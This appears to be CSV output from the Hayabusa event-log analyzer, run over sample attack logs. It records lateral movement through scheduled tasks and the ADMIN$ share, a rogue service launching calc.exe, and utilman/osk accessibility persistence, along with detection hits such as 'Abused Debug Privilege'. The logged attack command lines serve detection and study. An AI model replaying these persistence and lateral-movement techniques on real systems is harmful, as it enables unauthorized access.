2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,../hayabusa-rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.367 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.0.2.17 | LID: 0x17e2c0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:07.430 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.0.2.17 | LID: 0x17e2c0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:07.445 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:07.508 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.0.2.17 | LID: 0x17e2c0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:07.523 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:16.835 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: WIN-77LTAPHIQ1R | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,../hayabusa-rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:21.929 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer: | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x18423d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:41:29.008 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,info,Persis,Service Installed,Name: remotesvc | Path: calc.exe | Account: LocalSystem | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx
2019-03-20 02:22:24.761 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x39e47fa | PID: 3824 | PGUID: 365ABB72-2550-5C91-0000-00108FE4CF05",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:22:24.851 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x39e47fa | PID: 3688 | PGUID: 365ABB72-2550-5C91-0000-00101EE6CF05,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:22:24.901 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x39e47fa | PID: 4088 | PGUID: 365ABB72-2550-5C91-0000-00106CEACF05",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:22:40.373 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x39e47fa | PID: 3092 | PGUID: 365ABB72-2560-5C91-0000-0010C721DA05,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:26:03.585 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 4004 | PGUID: 365ABB72-262B-5C91-0000-0010B2566006,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:26:05.628 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x39e47fa | PID: 2792 | PGUID: 365ABB72-262D-5C91-0000-00108EA26106,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:31:03.687 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 3264 | PGUID: 365ABB72-2757-5C91-0000-0010A2B52A07,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:36:03.788 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 2056 | PGUID: 365ABB72-2883-5C91-0000-00101656F407,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:41:03.890 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 1756 | PGUID: 365ABB72-29AF-5C91-0000-0010B895C008,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:41:08.777 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 1876 | PGUID: 365ABB72-29B4-5C91-0000-00108191C308",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:41:08.967 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.EXE /c malwr.vbs | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x39e47fa | PID: 3748 | PGUID: 365ABB72-29B4-5C91-0000-0010289AC308,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:41:08.977 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logoff | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x39e47fa | PID: 3488 | PGUID: 365ABB72-29B4-5C91-0000-0010999AC308,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:41:09.828 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x1 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 2384 | PGUID: 365ABB72-29B5-5C91-0000-0010BE04C408",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:42:05.859 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe C:\Windows\system32\CompatTelRunner.exe | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 4012 | PGUID: 365ABB72-29ED-5C91-0000-00107271E808,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.238 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 360 | PGUID: 365ABB72-528C-5C91-0000-00104B4B0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.458 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 368 | PGUID: 365ABB72-528C-5C91-0000-0010644D0000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.699 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 408 | PGUID: 365ABB72-528D-5C91-0000-00103B500000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.719 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: wininit.exe | Process: C:\Windows\System32\wininit.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 416 | PGUID: 365ABB72-528D-5C91-0000-001056500000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.759 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 428 | PGUID: 365ABB72-528D-5C91-0000-00109C500000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\services.exe | Process: C:\Windows\System32\services.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 484 | PGUID: 365ABB72-528D-5C91-0000-001062560000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 500 | PGUID: 365ABB72-528D-5C91-0000-0010AD570000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.919 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsm.exe | Process: C:\Windows\System32\lsm.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 508 | PGUID: 365ABB72-528D-5C91-0000-0010DA570000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.929 +09:00,PC01.example.corp,1,info,,Process 
Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 516 | PGUID: 365ABB72-528D-5C91-0000-00100C580000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:12.931 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 632 | PGUID: 365ABB72-528F-5C91-0000-001073780000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:13.151 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\VBoxService.exe | Process: C:\Windows\System32\VBoxService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 692 | PGUID: 365ABB72-528F-5C91-0000-0010ECB50000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:13.181 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 876 | PGUID: 365ABB72-528F-5C91-0000-00106BBE0000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:13.221 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: 
C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1012 | PGUID: 365ABB72-5290-5C91-0000-001033D00000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:14.232 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1136 | PGUID: 365ABB72-5290-5C91-0000-00104C100100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:14.563 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Tasks\SA.DAT | Process: C:\Windows\system32\svchost.exe | PID: 1036 | PGUID: 365ABB72-5290-5C91-0000-0010E6D10000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:14.603 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\spoolsv.exe | Process: C:\Windows\System32\spoolsv.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1416 | PGUID: 365ABB72-5292-5C91-0000-00101E310100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1532 | PGUID: 
365ABB72-5292-5C91-0000-001036480100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.094 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Startup | Process: C:\Windows\System32\gpscript.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x3e7 | PID: 1616 | PGUID: 365ABB72-52A4-5C91-0000-0010A8560100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1628 | PGUID: 365ABB72-52B4-5C91-0000-0010355B0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1636 | PGUID: 365ABB72-52B4-5C91-0000-0010D55B0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent 
Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1676 | PGUID: 365ABB72-52B4-5C91-0000-0010C25D0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1788 | PGUID: 365ABB72-52CE-5C91-0000-00106F720100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1820 | PGUID: 
365ABB72-52CE-5C91-0000-00109D740100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.454 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Temp\wodCmdTerm.exe | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | PID: 1788 | PGUID: 365ABB72-52CE-5C91-0000-00106F720100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1948 | PGUID: 365ABB72-52EC-5C91-0000-001027860100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 304 | PGUID: 
